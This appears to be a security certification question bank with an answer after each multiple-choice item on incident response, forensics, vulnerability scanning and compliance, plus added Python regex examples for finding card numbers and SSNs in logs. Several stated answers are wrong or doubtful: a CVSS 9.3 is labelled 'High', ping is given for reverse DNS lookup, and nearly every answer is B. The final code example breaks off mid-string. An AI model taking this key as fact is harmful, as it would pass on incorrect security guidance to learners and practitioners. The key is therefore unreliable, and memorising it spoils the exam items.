An analyst is observing unusual network traffic from a workstation. The workstation is communicating with a known malicious site over an encrypted tunnel. A full antivirus scan with an updated antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation? A. Zero-day attack B. Known malware attack C. Session hijack D. Cookie stealing
A. Zero-day attack
The Chief Information Security Officer (CISO) asks a security analyst to write a new SIEM search rule to determine if any credit card numbers are being written to log files. The CISO and security analyst suspect the following log snippet contains real customer card data: RecordError-dumping affected entry: CustomerName: John Doe Card1RawString: 0413555577814399 Card2RawString: 0444719465780100 CVV: not-stored CustomerID: 1234-5678 Which of the following expressions would find potential credit card numbers in a format that matches the log snippet? A. ^[0-9]{16}$ B. (0-9) x 16 C. "1234-5678" D. "04*"
A. ^[0-9]{16}$
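Two practical caveats on that answer. First, the quantifier must be {16}: a parenthesised (16) would only match a single digit followed by the literal text "16". Second, ^ and $ anchor to the whole line or field, so ^[0-9]{16}$ only matches when the card number is the entire value being searched; a rule run over full log lines needs word boundaries instead, and a Luhn mod-10 check cuts the false positives from other 16-digit values. The following is an added example, not from the exam page, that does both; the log text is the question's snippet laid out one field per line.

```python
# Added example, not from the exam page: find 16-digit runs in log text and use the
# Luhn check to separate likely card numbers from other 16-digit values.
import re
from typing import List

CARD_FIELD_RE = re.compile(r"^[0-9]{16}$")       # exam answer: whole field is 16 digits
CARD_ANYWHERE_RE = re.compile(r"\b[0-9]{16}\b")  # 16-digit run inside a larger line


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:            # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_candidates(log_text: str) -> List[str]:
    """Every 16-digit run, wherever it sits on the line."""
    return CARD_ANYWHERE_RE.findall(log_text)


def find_likely_cards(log_text: str) -> List[str]:
    """Candidates that also pass Luhn; what a SIEM rule should alert on."""
    return [c for c in find_card_candidates(log_text) if luhn_ok(c)]


# The question's snippet, one field per line (reconstructed layout).
SAMPLE_LOG = """\
RecordError-dumping affected entry:
CustomerName: John Doe
Card1RawString: 0413555577814399
Card2RawString: 0444719465780100
CVV: not-stored
CustomerID: 1234-5678
"""

if __name__ == "__main__":
    print("candidates:", find_card_candidates(SAMPLE_LOG))
    print("pass Luhn: ", find_likely_cards(SAMPLE_LOG))
```

On the snippet itself the first value passes the Luhn check and the second does not, so the anchored regex alone would report both while the Luhn-filtered rule reports one; neither matches the CustomerID, because 1234-5678 is not a 16-digit run.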
A security analyst is performing a forensic analysis on a machine that was the subject of some historic SIEM alerts. The analyst noticed some network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in %TEMP% folder, and RDP files that had connected to external IPs. Which of the following threats has the security analyst uncovered? A. DDoS B. APT C. Ransomware D. Software vulnerability
B. APT
After analyzing and correlating activity from multiple sensors, the security analyst has determined a group from a high-risk country is responsible for a sophisticated breach of the company network and continuous administration of targeted attacks for the past three months. Until now, the attacks went unnoticed. This is an example of: A. privilege escalation. B. advanced persistent threat. C. malicious insider threat. D. spear phishing.
B. Advanced persistent threat
A threat intelligence feed has posted an alert stating there is a critical vulnerability in the kernel. Unfortunately, the company's asset inventory is not current. Which of the following techniques would a cybersecurity analyst perform to find all affected servers within an organization? A. A manual log review from data sent to syslog B. An OS fingerprinting scan across all hosts C. A packet capture of data traversing the server network D. A service discovery scan on the network
B. An OS fingerprinting scan across all hosts
Given the following log snippet: (see image Q-226) Which of the following describes the events that have occurred? A. An attempt to make an SSH connection from "superman" was done using a password. B. An attempt to make an SSH connection to 192.168.1.166 was done using PKI. C. An attempt to make an SSH connection from outside the network was done using PKI. D. An attempt to make an SSH connection from an unknown IP address was done using a password.
B. An attempt to make an SSH connection to 192.168.1.166 was done using PKI
A cybersecurity analyst has received an alert that well-known "call home" messages are continuously observed by network sensors at the network boundary. The proxy firewall successfully drops the messages. After determining the alert was a true positive, which of the following represents the MOST likely cause? A. Attackers are running reconnaissance on company resources. B. An outside command and control system is attempting to reach an infected system. C. An insider is trying to exfiltrate information to a remote network. D. Malware is running on a company system.
B. An outside command and control system is attempting to reach an infected system
A cybersecurity analyst has several SIEM event logs to review for possible APT activity. The analyst was given several items that include lists of indicators for both IP addresses and domains. Which of the following actions is the BEST approach for the analyst to perform? A. Use the IP addresses to search through the event logs. B. Analyze the trends of the events while manually reviewing to see if any of the indicators match. C. Create an advanced query that includes all of the indicators, and review any of the matches. D. Scan for vulnerabilities with exploits known to have been used by an APT.
B. Analyze the trends of the events while manually reviewing to see if any of the indicators match
An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive? A. Reports indicate that findings are informational. B. Any items labeled 'low' are considered informational only. C. The scan result version is different from the automated asset inventory. D. 'HTTPS' entries indicate the web page is encrypted securely.
B. Any items labeled "low" are considered informational only
An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive? A. Reports show the scanner compliance plug-in is out-of-date. B. Any items labeled 'low' are considered informational only. C. The scan result version is different from the automated asset inventory. D. 'HTTPS' entries indicate the web page is encrypted securely.
B. Any items labeled "low" are considered informational only
During which of the following NIST risk management framework steps would an information system security engineer identify inherited security controls and tailor those controls to the system? A. Categorize B. Select C. Implement D. Assess
B. Select
A cybersecurity analyst is hired to review the security posture of a company. The cybersecurity analyst notices a very high network bandwidth consumption due to SYN floods from a small number of IP addresses. Which of the following would be the BEST action to take to support incident response? A. Increase the company's bandwidth. B. Apply ingress filters at the routers. C. Install a packet capturing tool. D. Block all SYN packets.
B. Apply ingress filters at the routers
When does an attacker try to gain complete control of a system during a penetration test? A. Planning B. Attack C. Reporting D. Discovery
B. Attack
What is the proper threat classification for a security breach that employs brute-force methods to compromise, degrade, or destroy systems? A. Impersonation B. Attrition C. Improper Usage D. Loss or theft of equipment
B. Attrition
An ATM in a building lobby has been compromised. A security technician has been advised that the ATM must be forensically analyzed by multiple technicians. Which of the following items in a forensic tool kit would likely be used FIRST? (Choose two.) A. Drive adapters B. Chain of custody form C. Write blockers D. Crime tape E. Hashing utilities F. Drive imager
B. Chain of custody form C. Write blockers
A security audit revealed that port 389 has been used instead of 636 when connecting to LDAP for the authentication of users. The remediation recommended by the audit was to switch the port to 636 wherever technically possible. Which of the following is the BEST response? A. Correct the audit. This finding is a well-known false positive; the services that typically run on 389 and 636 are identical. B. Change all devices and servers that support it to 636, as encrypted services run by default on 636. C. Change all devices and servers that support it to 636, as 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks. D. Correct the audit. This finding is accurate, but the correct remediation is to update encryption keys on each of the servers to match port 636.
B. Change all devices and servers that support it to 636, as encrypted services run by default on 636
Which of the following elements is LEAST likely to be included in an organization's data retention policy? A. Minimum retention period B. Classification of information C. Maximum retention period D. Description of information needing to be retained
B. Classification of information
A security analyst determines that several workstations are reporting traffic usage on port 3389. All workstations are running the latest OS patches according to patch reporting. The help desk manager reports some users are getting logged off of their workstations, and network access is running slower than normal. The analyst believes a zero-day threat has allowed remote attackers to gain access to the workstations. Which of the following are the BEST steps to stop the threat without impacting all services? (Choose two.) A. Change the public NAT IP address since APTs are common. B. Configure a group policy to disable RDP access. C. Disconnect public Internet access and review the logs on the workstations. D. Enforce a password change for users on the network. E. Reapply the latest OS patches to workstations. F. Route internal traffic through a proxy server.
B. Configure a group policy to disable RDP access D. Enforce a password change for users on the network
Several accounting department users are reporting unusual Internet traffic in the browsing history of their workstations after returning to work and logging in. The building security team informs the IT security team that the cleaning staff was caught using the systems after the accounting department users left for the day. Which of the following steps should the IT security team take to help prevent this from happening again? (Choose two.) A. Install a web monitor application to track Internet usage after hours. B. Configure a policy for workstation account timeout at three minutes. C. Configure NAC to set time-based restrictions on the accounting group to normal business hours. D. Configure mandatory access controls to allow only accounting department users to access the workstations. E. Set up a camera to monitor the workstations for unauthorized use.
B. Configure a policy for workstation account timeout at three minutes C. Configure NAC to set time-based restrictions on the accounting group to normal business hours
A vulnerability scan has returned the following information: Detailed Results 10.10.10.214 (LOTUS-10-214) Windows Shares Category: Windows CVE ID: - Vendor Ref: - Bugtraq ID: - Service Modified - 4.16.2014 Enumeration Results: print$ C:\windows\system32\spool\drivers ofcscan C:\Program Files\Trend Micro\OfficeScan\PCCSRV Temp C:\temp Which of the following describes the meaning of these results? A. There is an unknown bug in a Lotus server with no Bugtraq ID. B. Connecting to the host using a null session allows enumeration of share names. C. Trend Micro has a known exploit that must be resolved or patched. D. No CVE is present, so it is a false positive caused by Lotus running on a Windows server.
B. Connecting to the host using a null session allows enumeration of share names
Trevor is responsible for conducting the vulnerability scans for his organization. His supervisor must produce a monthly report for the CIO that includes the number of open vulnerabilities. What process should Trevor use to ensure the supervisor gets the information needed for their monthly report? A. Run a report each month and then email it to his supervisor B. Create a custom report that is automatically emailed each month to the supervisor with the needed information C. Create an account for the supervisor on the vulnerability scanner so they can run their own reports D. Create an account for the supervisor's assistant so they can create their own reports
B. Create a custom report that is automatically emailed each month to the supervisor with the needed information
An analyst's vulnerability scanner did not have the latest set of signatures installed. Due to this, several unpatched servers may have vulnerabilities that were undetected by their scanner. You have directed the analyst to update their vulnerability scanner with the latest signatures at least 24 hours before conducting any scans, but the results of their scans still appear to be the same. Which of the following logical controls should you use to address this situation? A. Test the vulnerability remediations in a sandbox before deploying them into production B. Create a script to automatically update the signatures every 24 hours C. Ensure the analyst manually validates that the updates are being performed as directed D. Configure the vulnerability scanners to run in credentialed mode
B. Create a script to automatically update the signatures every 24 hours
Which of the following provides a cryptographic authentication mechanism to positively identify an organization as the authorized sender of email for a particular domain name? A. SPF B. DKIM C. SMTP D. DMARC
B. DKIM
When reviewing network traffic, a security analyst detects suspicious activity: (see image Q-110) Based on the log above, which of the following vulnerability attacks is occurring? A. ShellShock B. DROWN C. Zeus D. Heartbleed E. POODLE
B. DROWN
A systems administrator is trying to secure a critical system. The administrator has placed the system behind a firewall, enabled strong authentication, and required all administrators of this system to attend mandatory training. Which of the following BEST describes the control being implemented? A. Audit remediation B. Defense in depth C. Access control D. Multifactor authentication
B. Defense in depth
A cybersecurity analyst was hired to resolve a security issue within a company after it was reported that many employee account passwords had been compromised. Upon investigating the incident, the cybersecurity analyst found that a brute force attack was launched against the company. Which of the following remediation actions should the cybersecurity analyst recommend to senior management to address these security issues? A. Prohibit password reuse using a GPO. B. Deploy multifactor authentication. C. Require security awareness training. D. Implement DLP solution.
B. Deploy multifactor authentication
Mike has discovered a service is running on one of the ports known as a registered port while running a port scanner. Based on this, which of the following can Mike determine? A. Vulnerability status of the service B. Service is running on a port between 1024 and 49151 C. Service is running on a port between 0-1023 D. Name of the service
B. Service is running on a port between 1024 and 49151
Which of the following is a best practice with regard to interacting with the media during an incident? A. Allow any senior management level personnel with knowledge of the incident to discuss it. B. Designate a single point of contact and at least one backup for contact with the media. C. Stipulate that incidents are not to be discussed with the media at any time during the incident. D. Release financial information on the impact of damages caused by the incident.
B. Designate a single point of contact and at least one backup for contact with the media
A security analyst is reviewing the following log after enabling key-based authentication. (See image Q-36) Given the above information, which of the following steps should be performed NEXT to secure the system? A. Disable anonymous SSH logins. B. Disable password authentication for SSH. C. Disable SSHv1. D. Disable remote root SSH logins.
B. Disable password authentication for SSH
The primary difference in concern between remediating identified vulnerabilities found in general-purpose IT network servers and that of SCADA systems is that: A. change and configuration management processes do not address SCADA systems. B. doing so has a greater chance of causing operational impact in SCADA systems. C. SCADA systems cannot be rebooted to have changes to take effect. D. patch installation on SCADA systems cannot be verified.
B. Doing so has a greater chance of causing operational impact in SCADA systems
Which of the following information is traditionally found in the SOW for a penetration test? A. Maintenance windows B. Excluded hosts C. Timing of scan D. Format of the executive summary report
B. Excluded hosts
What regulation protects the privacy of student educational records? A. HIPAA B. FERPA C. SOX D. GLBA
B. FERPA
A security analyst is adding input to the incident response communication plan. A company officer has suggested that if a data breach occurs, only affected parties should be notified to keep an incident from becoming a media headline. Which of the following should the analyst recommend to the company officer? A. The first responder should contact law enforcement upon confirmation of a security incident in order for a forensics team to preserve chain of custody. B. Guidance from laws and regulations should be considered when deciding who must be notified in order to avoid fines and judgments from non-compliance. C. An externally hosted website should be prepared in advance to ensure that when an incident occurs victims have timely access to notifications from a non-compromised resource. D. The HR department should have information security personnel who are involved in the investigation of the incident sign non-disclosure agreements so the company cannot be held liable for customer data that might be viewed during an investigation.
B. Guidance from laws and regulations should be considered when deciding who must be notified in order to avoid fines and judgments from non-compliance
You are going to perform a forensic disk image of a macOS laptop. What type of hard drive format should you expect to encounter? A. NTFS B. HFS+ C. FAT32 D. exFAT
B. HFS+
Maria is interpreting a vulnerability that has a CVSS base score of 9.3. What risk category would this vulnerability fit into? A. Critical B. High C. Medium D. Low
B. High
Which of the protocols listed is NOT likely to be a trigger for a vulnerability scan alert when it is used to support a virtual private network (VPN)? A. SSLv2 B. IPSec C. PPTP D. SSLv3
B. IPSec
An organization has recently recovered from an incident where a managed switch had been accessed and reconfigured without authorization by an insider. The incident response team is working on developing a lessons learned report with recommendations. Which of the following recommendations will BEST prevent the same attack from occurring in the future? A. Remove and replace the managed switch with an unmanaged one. B. Implement a separate logical network segment for management interfaces. C. Install and configure NAC services to allow only authorized devices to connect to the network. D. Analyze normal behavior on the network and configure the IDS to alert on deviations from normal.
B. Implement a separate logical network segment for management interfaces
In 2014, Apple's implementation of SSL had a severe vulnerability that, when exploited, allowed an attacker to gain a privileged network position that would allow them to capture or modify data in an SSL/TLS session. This was caused by poor programming in which a failed check of the connection would exit the function too early. Based on this description, what is this an example of? A. Insecure object reference B. Improper error handling C. Insufficient logging and monitoring D. Use of insecure functions
B. Improper error handling
A recently issued audit report highlighted exceptions related to end-user handling of sensitive data and access credentials. A security manager is addressing the findings. Which of the following activities should be implemented? A. Update the password policy B. Increase training requirements C. Deploy a single sign-on platform D. Deploy Group Policy Objects
B. Increase training requirements
Which control provides the best protection against both SQL injection and cross-site scripting attacks? A. CSRF B. Input validation C. Network layer firewall D. Hypervisor
B. Input validation
Your organization has recently suffered a cyber attack when an employee made an unauthorized modification to another employee's timesheet and payroll records. What objective of cybersecurity has been violated? A. Confidentiality B. Integrity C. Availability D. Non-repudiation
B. Integrity
Management is concerned with administrator access from outside the network to a key server in the company. Specifically, firewall rules allow access to the server from anywhere in the company. Which of the following would be an effective solution? A. Honeypot B. Jump box C. Server hardening D. Anti-malware
B. Jump box
What technology is NOT a shared authentication protocol? A. OpenID B. LDAP C. OAuth D. Facebook Connect
B. LDAP
Which of the following actions should occur to address any open issues while closing an incident involving various departments within the network? A. Incident response plan B. Lessons learned report C. Reverse engineering process D. Chain of custody documentation
B. Lessons learned report
A security analyst has determined the security team should take action based on the following log: (see image Q-200) Which of the following should be used to improve the security posture of the system? A. Enable login account auditing. B. Limit the number of unsuccessful login attempts. C. Upgrade the firewalls. D. Increase password complexity requirements.
B. Limit the number of unsuccessful login attempts
A security analyst at a small regional bank has received an alert that nation states are attempting to infiltrate financial institutions via phishing campaigns. Which of the following techniques should the analyst recommend as a proactive measure to defend against this type of threat? A. Honeypot B. Location-based NAC C. System isolation D. Mandatory access control E. Bastion host
B. Location-based NAC
On which of the following organizational resources is the lack of an enabled password or PIN a common vulnerability? A. VDI systems B. Mobile devices C. Enterprise server OSs D. VPNs E. VoIP phones
B. Mobile devices
A Chief Information Security Officer (CISO) wants to standardize the company's security program so it can be objectively assessed as part of an upcoming audit requested by management. Which of the following would holistically assist in this effort? A. ITIL B. NIST C. Scrum D. AUP E. Nessus
B. NIST
The Chief Executive Officer (CEO) instructed the new Chief Information Security Officer (CISO) to provide a list of enhancements to the company's cybersecurity operation. As a result, the CISO has identified the need to align security operations with industry best practices. Which of the following industry references is appropriate to accomplish this? A. OSSIM B. NIST C. PCI D. OWASP
B. NIST
Due to new regulations, a company has decided to institute an organizational vulnerability management program and assign the function to the security team. Which of the following frameworks would BEST support the program? (Choose two.) A. COBIT B. NIST C. ISO 27000 series D. ITIL E. OWASP
B. NIST C. ISO 27000 Series
An organization has recently experienced a data breach. A forensic analysis confirmed the attacker found a legacy web server that had not been used in over a year and was not regularly patched. After a discussion with the security team, management decided to initiate a program of network reconnaissance and penetration testing. They want to start the process by scanning the network for active hosts and open ports. Which of the following tools is BEST suited for this job? A. Ping B. Nmap C. Netstat D. ifconfig E. Wireshark F. L0phtCrack
B. Nmap
Considering confidentiality and integrity, which of the following make servers more secure than desktops? (Choose three.) A. VLANs B. OS C. Trained operators D. Physical access restriction E. Processing power F. Hard drive capacity
B. OS C. Trained operators D. Physical access restriction
Your organization is preparing for its required quarterly PCI DSS external vulnerability scan. Who is authorized to perform this scan? A. Any qualified individual B. Only an approved scanning vendor C. Anyone D. Only employees of the company
B. Only an approved scanning vendor
Matt and Jason work together to review Matt's programming code with Matt explaining what his code is doing as they review it. What type of code review is being conducted? A. Pair programming B. Over-the-shoulder C. Dual control D. Tool-assisted review
B. Over-the-shoulder
A medical organization recently started accepting payments over the phone. The manager is concerned about the impact of the storage of different types of data. Which of the following types of data incurs the highest regulatory constraints? A. PHI B. PCI C. PII D. IP
B. PCI
Which of the following would NOT be useful in defending against a zero-day threat? A. Threat intelligence B. Patching C. Segmentation D. Whitelisting
B. Patching
The development team currently consists of three developers who each specialize in a specific programming language: Developer 1: C++/C#; Developer 2: Python; Developer 3: Assembly. Which of the following SDLC best practices would be challenging to implement with the current available staff? A. Fuzzing B. Peer review C. Regression testing D. Stress testing
B. Peer review
An alert has been distributed throughout the information security community regarding a critical Apache vulnerability. Which of the following courses of action would ONLY identify the known vulnerability? A. Perform an unauthenticated vulnerability scan on all servers in the environment. B. Perform a scan for the specific vulnerability on all web servers. C. Perform a web vulnerability scan on all servers in the environment. D. Perform an authenticated scan on all web servers in the environment.
B. Perform a scan for the specific vulnerability on all web servers
A system administrator who was using an account with elevated privileges deleted a large number of log files generated by a virtual hypervisor in order to free up disk space. These log files are needed by the security team to analyze the health of the virtual machines. Which of the following compensating controls would help prevent this from reoccurring? (Choose two.) A. Succession planning B. Separation of duties C. Mandatory vacation D. Personnel training E. Job rotation
B. Separation of Duties D. Personnel Training
Which of the following utilities could be used to resolve an IP address to a domain name, assuming the address has a PTR record? A. ifconfig B. ping C. arp D. nbtstat
B. Ping
After running a packet analyzer on the network, a security analyst has noticed the following output: (see image Q-71) Which of the following is occurring? A. A ping sweep B. A port scan C. A network map D. A service discovery
B. Port scan
An analyst was testing the latest version of an internally developed CRM system. The analyst created a basic user account. Using a few tools in Kali's latest distribution, the analyst was able to access configuration files, change permissions on folders and groups, and delete and create new system objects. Which of the following techniques did the analyst use to perform these unauthorized activities? A. Impersonation B. Privilege escalation C. Directory traversal D. Input injection
B. Privilege escalation
A company has implemented WPA2, a 20-character minimum for the WiFi passphrase, and a new WiFi passphrase every 30 days, and has disabled SSID broadcast on all wireless access points. Which of the following is the company trying to mitigate? A. Downgrade attacks B. Rainbow tables C. SSL pinning D. Forced deauthentication
B. Rainbow tables
An analyst reviews a recent report of vulnerabilities on a company's financial application server. Which of the following should the analyst rate as being of the HIGHEST importance to the company's environment? A. Banner grabbing B. Remote code execution C. SQL injection D. Use of old encryption algorithms E. Susceptibility to XSS
B. Remote code execution
Policy allows scanning of vulnerabilities during production hours, but production servers have been crashing lately due to unauthorized scans performed by junior technicians. Which of the following is the BEST solution to avoid production server downtime due to these types of scans? A. Transition from centralized to agent-based scans. B. Require vulnerability scans be performed by trained personnel. C. Configure daily-automated detailed vulnerability reports. D. Implement sandboxing to analyze the results of each scan. E. Scan only as required for regulatory compliance.
B. Require vulnerability scans be performed by trained personnel
Alerts have been received from the SIEM, indicating infections on multiple computers. Based on threat characteristics, these files were quarantined by the host-based antivirus program. At the same time, additional alerts in the SIEM show multiple blocked URLs from the address of the infected computers; the URLs were classified as uncategorized. The domain location of the IP address of the URLs that were blocked is checked, and it is registered to an ISP in Russia. Which of the following steps should be taken NEXT? A. Remove those computers from the network and replace the hard drives. Send the infected hard drives out for investigation. B. Run a full antivirus scan on all computers and use Splunk to search for any suspicious activity that happened just before the alerts were received in the SIEM. C. Run a vulnerability scan and patch discovered vulnerabilities on the next patching cycle. Have the users restart their computers. Create a use case in the SIEM to monitor failed logins on the infected computers. D. Install a computer with the same settings as the infected computers in the DMZ to use as a honeypot. Permit the URLs classified as uncategorized to and from that host.
B. Run a full antivirus scan on all computers and use Splunk to search for any suspicious activity that happened just before the alerts were received in the SIEM
A security analyst has just completed a vulnerability scan of servers that support a business critical application that is managed by an outside vendor. The results of the scan indicate the devices are missing critical patches. Which of the following factors can inhibit remediation of these vulnerabilities? (Choose two.) A. Inappropriate data classifications B. SLAs with the supporting vendor C. Business process interruption D. Required sandbox testing E. Incomplete asset inventory
B. SLAs with the supporting vendor C. Business process interruption
What is NOT part of the security incident validation effort? A. Scanning B. Sanitization C. Patching D. Permissions
B. Sanitization
A penetration tester is preparing for an audit of critical systems that may impact the security of the environment. This includes the external perimeter and the internal perimeter of the environment. During which of the following processes is this type of information normally gathered? A. Timing B. Scoping C. Authorization D. Enumeration
B. Scoping
A cybersecurity analyst is conducting a security test to ensure that information regarding the web server is protected from disclosure. The cybersecurity analyst requested an HTML file from the web server, and the response came back as follows: HTTP/1.1 404 Object Not Found Server: Microsoft-IIS/5.0 Date: Tues, 19 Apr 2016 06:32:24 GMT Content-Type: text/html Content-Length: 111 <html><head><title>Site Not Found</title></head><body>No web site is configured at this address. </body></html> Which of the following actions should be taken to remediate this security issue? A. Set "Allowlatescanning" to 1 in the URLScan.ini configuration file. B. Set "Removeserverheader" to 1 in the URLScan.ini configuration file. C. Set "Enablelogging" to 0 in the URLScan.ini configuration file. D. Set "Perprocesslogging" to 1 in the URLScan.ini configuration file.
B. Set "Removeserverheader" to 1 in the URLScan.ini configuration file
You are analyzing the logs of a forensic analyst's workstation and see the following: root@DionTraining:/home# dd if=/dev/sdc of=/dev/sdb bs=1M count=1000 What does the bs=1M signify in the command listed above? A. Removes error messages and other incorrect data B. Sets the block size C. Sends output to a blank sector D. Sets the beginning sector
B. Sets the block size
A cybersecurity analyst has several log files to review. Instead of using grep and cat commands, the analyst decides to find a better approach to analyze the logs. Given a list of tools, which of the following would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output a report? A. Kali B. Splunk C. Syslog D. OSSIM
B. Splunk
A security analyst is creating ACLs on a perimeter firewall that will deny inbound packets that are from internal addresses, reserved external addresses, and multicast addresses. Which of the following is the analyst attempting to prevent? A. Broadcast storms B. Spoofing attacks C. DDoS attacks D. Man-in-the-middle attacks
B. Spoofing attacks
Firewalls, intrusion detection systems, and RADIUS are all examples of which type of control? A. Compensating controls B. Technical controls C. Physical controls D. Administrative controls
B. Technical controls
Which of the following categories of controls are firewalls, intrusion detection systems, and a RADIUS server classified as? A. Compensating controls B. Technical controls C. Physical controls D. Administrative controls
B. Technical controls
Which of the following protocols is considered insecure and should never be used in your networks? A. HTTPS B. Telnet C. SFTP D. SSH
B. Telnet
A security analyst received several service tickets reporting that a company storefront website is not accessible by internal domain users. However, external users are accessing the website without issue. Which of the following is the MOST likely reason for this behavior? A. The FQDN is incorrect. B. The DNS server is corrupted. C. The time synchronization server is corrupted. D. The certificate is expired.
B. The DNS server is corrupted
An insurance company employs quick-response team drivers that carry corporate-issued mobile devices with the insurance company's app installed on them. Devices are configuration-hardened by an MDM and kept up to date. The employees use the app to collect insurance claim information and process payments. Recently, a number of customers have filed complaints of credit card fraud against the insurance company, which occurred shortly after their payments were processed via the mobile app. The cyber-incident response team has been asked to investigate. Which of the following is MOST likely the cause? A. The MDM server is misconfigured. B. The app does not employ TLS. C. USB tethering is enabled. D. 3G and less secure cellular technologies are not restricted.
B. The app does not employ TLS
A cybersecurity analyst has identified a new mission-essential function that utilizes a public cloud-based system. The analyst needs to classify the information processed by the system with respect to CIA. Which of the following should provide the CIA classification for the information? A. The cloud provider B. The data owner C. The cybersecurity analyst D. The system administrator
B. The data owner
A cybersecurity analyst is reviewing the following outputs: (see image Q-135) Which of the following can the analyst infer from the above output? A. The remote host is redirecting port 80 to port 8080. B. The remote host is running a service on port 8080. C. The remote host's firewall is dropping packets for port 80. D. The remote host is running a web server on port 80.
B. The remote host is running a service on port 8080
A Linux-based file encryption malware was recently discovered in the wild. Prior to running the malware on a preconfigured sandbox to analyze its behavior, a security professional executes the following command: umount -a -t cifs,nfs Which of the following is the main reason for executing the above command? A. To ensure the malware is memory bound. B. To limit the malware's reach to the local host. C. To back up critical files across the network. D. To test if the malware affects remote systems.
B. To limit the malware's reach to the local host
Which of the following is a control that allows a mobile application to access and manipulate information which should only be available by another application on the same mobile device (e.g. a music application posting the name of the current song playing on the device on a social media site)? A. Co-hosted application B. Transitive trust C. Mutually exclusive access D. Dual authentication
B. Transitive trust
A security analyst received a compromised workstation. The workstation's hard drive may contain evidence of criminal activities. Which of the following is the FIRST thing the analyst must do to ensure the integrity of the hard drive while performing the analysis? A. Make a copy of the hard drive. B. Use write blockers. C. Run rm -R command to create a hash. D. Install it on a different machine and explore the content.
B. Use write blockers
You have been tasked to create some baseline system images in order to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry-standard benchmarks? A. Utilizing a known malware plugin B. Utilizing an operating system SCAP plugin C. Utilizing an authorized credentialed scan D. Utilizing a non-credentialed scan
B. Utilizing an operating system SCAP plugin
Which of the following systems would be at the GREATEST risk of compromise if found to have an open vulnerability associated with perfect forward secrecy? A. Endpoints B. VPN concentrators C. Virtual hosts D. SIEM E. Layer 2 switches
B. VPN concentrators
A cybersecurity analyst is completing an organization's vulnerability report and wants it to reflect assets accurately. Which of the following items should be in the report? A. Processor utilization B. Virtual hosts C. Organizational governance D. Log disposition E. Asset isolation
B. Virtual Hosts
There have been several exploits to critical devices within the network. However, there is currently no process to perform vulnerability analysis. Which of the following should the security analyst implement during production hours to identify critical threats and vulnerabilities? A. Asset inventory of all critical devices B. Vulnerability scanning frequency that does not interrupt workflow C. Daily automated reports of exploited devices D. Scanning of all types of data regardless of sensitivity levels
B. Vulnerability scanning frequency that does not interrupt workflow
Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system? A. Intrusion Detection System B. Whitelisting C. MAC Filtering D. VPN
B. Whitelisting
During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true? A. The scan will not produce any useful information B. You are scanning a CDN-hosted copy of the site C. Nothing can be determined about this site with the information provided D. The server assumes you are conducting a DDoS attack
B. You are scanning a CDN-hosted copy of the site
Using a heuristic system to detect an anomaly in a computer's baseline, a system administrator was able to detect an attack even though the company's signature-based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port, and executed it to trigger a privilege escalation flaw. Which of the following attacks has MOST likely occurred? A. Cookie stealing B. Zero-day C. Directory traversal D. XML injection
B. Zero-day
An HR employee began having issues with a device becoming unresponsive after attempting to open an email attachment. When informed, the security analyst became suspicious of the situation, even though there was not any unusual behavior on the IDS or any alerts from the antivirus software. Which of the following BEST describes the type of threat in this situation? A. Packet of death B. Zero-day malware C. PII exfiltration D. Known virus
B. Zero-day malware
Which of the following techniques would allow an attacker to get a full listing of your internal DNS information if your DNS server is not properly secured? A. FQDN resolution B. Zone transfers C. DNS poisoning D. Split horizon
B. Zone transfers
Company A suspects an employee has been exfiltrating PII via a USB thumb drive. An analyst is tasked with attempting to locate the information on the drive. The PII in question includes the following: [email protected] 564-23-4765 [email protected] 754-09-3276 [email protected] 143-32-2323 [email protected] 545-11-0192 [email protected] 093-45-3748 Which of the following would BEST accomplish the task assigned to the analyst? A. 3 [0-9]\d-2[0-9]\d-4[0-9]\d B. \d(3)-\d(2)-\d(4) C. ?[3]-?[2]-?[3] D. \d[9]|'XXX-XX-XX'
B. \d(3)-\d(2)-\d(4) (closest option to the SSN shape; note that the correct regex quantifier syntax is \d{3}-\d{2}-\d{4}, since parentheses make a capturing group rather than a repetition count)
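The following is an added example (not part of the question bank) showing a working SSN and e-mail finder for the evidence search above, and why the quantifier must be written with braces. The mailbox names are made up, because the page redacts the real addresses; the two decoy numbers are constructed to check that the pattern does not over-match.

```python
import re

# Added example, not part of the question bank. Locate the two PII formats from
# the question (US SSNs and e-mail addresses) in arbitrary text.
#
# The answer key spells the SSN pattern \d(3)-\d(2)-\d(4). In every mainstream
# regex dialect (3) is a capturing group holding the literal character "3", so
# that pattern only matches "<digit>3-<digit>2-<digit>4". The repetition
# quantifier is written with braces: \d{3}-\d{2}-\d{4}.
SSN_RE = re.compile(r"(?<![\d-])\d{3}-\d{2}-\d{4}(?![\d-])")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
BROKEN_SSN_RE = re.compile(r"\d(3)-\d(2)-\d(4)")  # the key's pattern, verbatim

# Constructed sample: the five SSNs from the question paired with made-up
# mailbox names, plus two decoys a sloppy pattern would misreport: a phone
# number and a 4-2-4 digit group.
SAMPLE = (
    "jdoe@example.com 564-23-4765 asmith@example.com 754-09-3276 "
    "bjones@example.com 143-32-2323 cwhite@example.com 545-11-0192 "
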